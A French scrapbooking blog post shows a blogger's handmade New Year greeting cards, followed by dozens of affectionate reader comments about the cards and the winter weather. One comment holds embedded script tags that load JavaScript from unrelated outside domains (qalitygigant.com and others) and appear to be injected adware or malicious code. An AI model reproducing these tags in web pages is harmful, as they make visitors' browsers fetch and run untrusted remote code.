• Cartes de Voeux

     

     

    Cartes de Voeux

     

    [ à Retrouver dans la Rubrique "Loisirs"-"Scrapbooking"-"Cartes de Vœux" ICI ]

    [ L'oiseau sur la lanterne est à retrouver dans la Rubrique "Mes Tubes"-"Noël" ICI ]

     

     

    Bonjour tout le Monde,

     

    J'espère que vous allez bien et que le froid de l'hiver ne vous gêne pas trop...

    Pour ma part, j'attends la neige.... je garde espoir !!!

    En attendant, voici quelques cartes de vœux réalisées ces jours-ci...

     

     

    Cartes de Voeux

     

     

     

     

    Cartes de Voeux

     

     

     

     

    Cartes de Voeux

     

     

     

     

    Cartes de Voeux

     

     

     

     

    Cartes de Voeux

     

    [ à Retrouver dans la Rubrique "Séparations"-"Hiver,Noël" ICI ]

     

     

     

     

    Cartes de Voeux

     

     

     

     

    Cartes de Voeux

     

    [ à Retrouver dans la Rubrique "Bisous"-"Hiver,Noël" ICI ]

    [ le goûter de Noël est à Retrouver dans la Rubrique "Mes Tubes"-"Noël" ICI ]

     

     

     

     

    Cartes de Voeux

     

    [ à Retrouver dans la Rubrique "Jours"-"Lundi"-"Hiver" ICI ]

    [Décliné en "Bonne Semaine" dans la Rubrique du même nom "Semaine"-"Hiver,Noël" ICI ]

     

     


    Tags Tags : , , , , ,
  • Commentaires

    39
    Mercredi 30 Décembre 2020 à 16:48

    De bien jolies cartes une préférence pour la dernière

    Bisous

    38
    Lundi 14 Décembre 2020 à 19:22

    tes cartes sont tres belles

    bisous

    37
    Samedi 12 Décembre 2020 à 10:17

    Très belles cartes faites avec soin et beaucoup d élégance, elles sont raffinées, comme j aime, merci ma douce de nous les partager et en fait merci pour tout , car tout ce que tu fait , nous procure beaucoup de bonheur , pour moi tu es mon etre de lumiere, quand ça ne va pas je viens ici et je me ressource

    Alors doux week end à toi et moi je vais beaucoup, mais beaucoup m occuper pour eviter le monde extérieur , j ai tant de choses à faire bisous du ♥

    36
    Vendredi 11 Décembre 2020 à 20:54

    une jolie série de cartes pour les fêtes. très bonne soirée bisous liliane

    35
    Jeudi 10 Décembre 2020 à 14:20
    dane

    coucou tes cartes sont toujours magnifiques j' aime beaucoup les détails bravo bisous a très vite 

    34
    Mercredi 9 Décembre 2020 à 19:40
    De très jolies cartes bisous
    33
    Mardi 8 Décembre 2020 à 16:43

    Bonjour ma douce Valie

    Elles sont magnifiques tes cartes de voeux 

    Ici il a fait un peu de soleil cette après-midi mais nous avons eu de la neige dimanche 

    Je te souhaite une bonne fin de journée  et t'envoie de gros bisous

    ton amie Janine

    Bon Début de Semaine

    32
    Mardi 8 Décembre 2020 à 12:03

    De bien belles cartes, comme toutes celles que tu fais d'ailleurs

    Bonne journée, nous le soleil arrive ce serait bien qu'il reste

    Bonne journée

    Bisous

     

    31
    Mardi 8 Décembre 2020 à 10:56

    Elles sont jolies comme tout tes cartes, bravo ma tite Valie!

    Bisous et belle journée

    30
    Mardi 8 Décembre 2020 à 10:26

    elles sont toutes jolies et brillantes comme je les aime, bravo!!!! excuse hier fiston m'a réparé mes boites mails, j'avais un souci sur toutes (et cela faisait plusieurs mois que ça durait, sur certaines je n'avais plus rien et sur d'autres quelques messages seulement, donc j'en ai plusieurs centaines à retrier du coup pff!! bisous bonne semaine et prends soin de toi

    29
    Mardi 8 Décembre 2020 à 07:30

    Superbe trio de cartes Valie ! Coup de cœur pour la 3ème... Bravo !

    A bientôt ! Bisous bisous !

    28
    Lundi 7 Décembre 2020 à 22:33

    Très jolies cartes, bravo à toi !!!

    Bisous

    27
    Gaelle
    Lundi 7 Décembre 2020 à 21:42
    Jolie série et merci pour les gifs
    Biz
    Gaelle
    26
    Lundi 7 Décembre 2020 à 21:06

    https://i.postimg.cc/1XN0Qz7k/valie.gifmerci pour ce très beau partage.

     

    25
    Lundi 7 Décembre 2020 à 20:24
    Trop belles tes cartes coup de coeur pour celle avec les étoiles bravo Gros bisous Pierrette67
    24
    Lundi 7 Décembre 2020 à 19:01
    lamanuelle25

    Très jolies tes cartes, bravo Bises Nadine

    23
    Lundi 7 Décembre 2020 à 18:16

    jolie petite série !

    comme toi j'aimerais avoir la neige rien que pour les paysages que cela nous offre moins sympa pour ceux qui roulent et qui vont au boulot mais bon ce serai tellement reposant 

    bisous bonne soirée 

    22
    Lundi 7 Décembre 2020 à 18:10

    Très jolie ta série de cartes Valie, j'aime beaucoup

    Bonne semaine à toi et gros bisous en attendant de voir tes prochaines créations

    21
    Jacline-H-49
    Lundi 7 Décembre 2020 à 17:02

    Coucou chère Valie,

    Elles sont très belles toutes les trois, j'ai du mal à en choisir une. Félicitations à nouveau.

    Sale temps encore aujourd'hui, je pense qu'il est pareil chez toi et que ça ne te plait pas du tout, tu as raison, il va falloir s'y faire, il y en a pour quelques jours, environ 15 jours ! Beurkk !

    Bonne soirée mon amie

    GROS BISOUS TENDRESSE de

    Jacline 

     

    20
    Lundi 7 Décembre 2020 à 16:14

    UE DE JOLIE CARTE TU VA  FAIRE LE BONHEUR DES PERSONNES QUI VONS LES RECEVOIR BISOUS

    19
    Lundi 7 Décembre 2020 à 15:32

    Oh, j'adore tes cartes !

    Bravo !

    Bonne fin de journée.
    Bisous.

    18
    Lundi 7 Décembre 2020 à 13:49

    Bien jolie série. Pas fan du vert (mais c'est un goût personnel) mais j'aime beaucoup tes cartes avec un coup de coeur sur la première du coup

    Bravo pour cette série
    Gros Bisous

    17
    JO
    Lundi 7 Décembre 2020 à 13:37

    Coucou ma Valie

    Pas de cartes de Noël, pas de cartes de voeux pour moi cette année.

    Par contre ta série de cartes est magnifiques, bien inspirée pour les réaliser♥♥♥♥

    BRAVO

    Bon lundi, chez moi bien ensoleillé mais un peu friquet, on voit la neige dans les hauteurs!!!

    BISOUS

    JO

    BISOUS HIVER/NOËL 4

    16
    Lundi 7 Décembre 2020 à 12:31

    Très belle ta série de cartes!! Bravo à toi.....

    Il annonce encore de la neige en plaine cette semaine.

    Bisous et douce journée

    15
    Lundi 7 Décembre 2020 à 12:23

    Comme toujours c'est tellement doudou...j'adore ces petits moments fait par Toi.Merci Valie.

    Nous rentrons dans l'hiver...Brrr que c'est humide.

    Je pense bien à Toi.Gros bisous.

    Bonne Semaine ... HIVER/NOËL 1

    14
    mamijojo77100
    Lundi 7 Décembre 2020 à 12:09

    merci pour ton com sur mes cartes effectivement j ai mis le turbo, a part la popote que faire par ces temps ci il faut s occuper l esprit dans les meilleurs conditions, a part qqx courses et au chaud. les tiennes sont sympa aussi, nous avons toutes des styles differents et c est interessant.. par contre la neige je n y tiens pas. un peu trop tot.. gbisous ET BONNE SEMAINE   joelle

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1607339089580" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    13
    marianne pirotte
    Lundi 7 Décembre 2020 à 11:57

    De très jolies cartes !! J'attends la neige aussi, mais toujours rien

    Gros bisous

    Marianne

    12
    Jeannine (cristal24)
    Lundi 7 Décembre 2020 à 11:56

    Belle série de cartes, bravo.

    Je te souhaite une bonne semaine bien au chaud.

    Mo, je n'ai pas envie que la neige arrive, car je serais coincée chez moi; comme j'ai une pente pour accéder à la route, je ne pourrais pas la monter avec la voiture, et ça risquerait de glisser (hi hi !!).

    A bientôt.  Bises.

    Jeannine

     

    11
    Lundi 7 Décembre 2020 à 10:53

    Elles sont magnifiques tes cartes Valie 

    Un réel plaisir pour les yeux Bravo à toi et gros bisou 

    10
    Lundi 7 Décembre 2020 à 10:21

    Bravo pour tes petites merveilles. Bonne journée. Bisous

    9
    mamyvel
    Lundi 7 Décembre 2020 à 10:17

    Merci Valie, de bien jolies cartes,

    bon lundi, bisous

    8
    Jour de mai
    Lundi 7 Décembre 2020 à 10:05

    Coucou Valie, 

    Magnifiques tes cartes, j'adore, sans doute le début d'une belle série. Pour la neige, chez nous ce sera sans et s'il y en a c'est souven Février, Mars alors on attendra mais je crains  que ce soit longtemps. 

    Bravo à toi et merci pour ce partage. Alors les biscuits étaient-ils bons, je pense que vous les avez goutés !!!!!! Dommage je ne les ai pas vus, pas de FB. 

    Bonne nouvelle semaine qui j'espère sera calme et douce. 

    Très gros bisous ♥♥♥♥

    LN

    7
    Lundi 7 Décembre 2020 à 09:12
    Coucou Valie ! Elles sont superbes tes cartes ! Pour la neige, ici c'est plys souvent en février/mars mais elle se fait rare depuis quelques années
    6
    Lundi 7 Décembre 2020 à 09:10

    tu prends de l'avance et tu as raison ; de bien jolies cartes.

    Bonne semaine ; bisous / Nicole

    5
    Lundi 7 Décembre 2020 à 08:49

    elles sont magnifiques tes cartes ! j'adore

    bisous ! pour la neige ??? moi aussi j'aimerais bien !!!

    4
    Lundi 7 Décembre 2020 à 08:38

    Moi aussi les cartes de voeux se poursuivent, mais je les montrerai qu'une fois qu'elles seront envoyés ;-)

    Bonne journée

    Thaly

    3
    Lundi 7 Décembre 2020 à 08:31

      une  bien  belle  série   bravo 

      gros  bisous

    L’email a bien été copié
    <textarea id="cliquemailclipboardAreaToText"></textarea>
    2
    Lundi 7 Décembre 2020 à 08:00

    Superbe tite série ma Valie, Bravo !!

    Mes Loulous aussi attendent la neige, moi pas trop, Mdr !!!

    Mille Bisous affectueux.

    1
    Lundi 7 Décembre 2020 à 07:31

    Bonjour ma Valie, tu nous as fait de petites merveilles

    elles sont superbes tes cartes ... bravo !!

    Je te souhaite une bonne nouvelle semaine

    Bisous de Pat

     

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :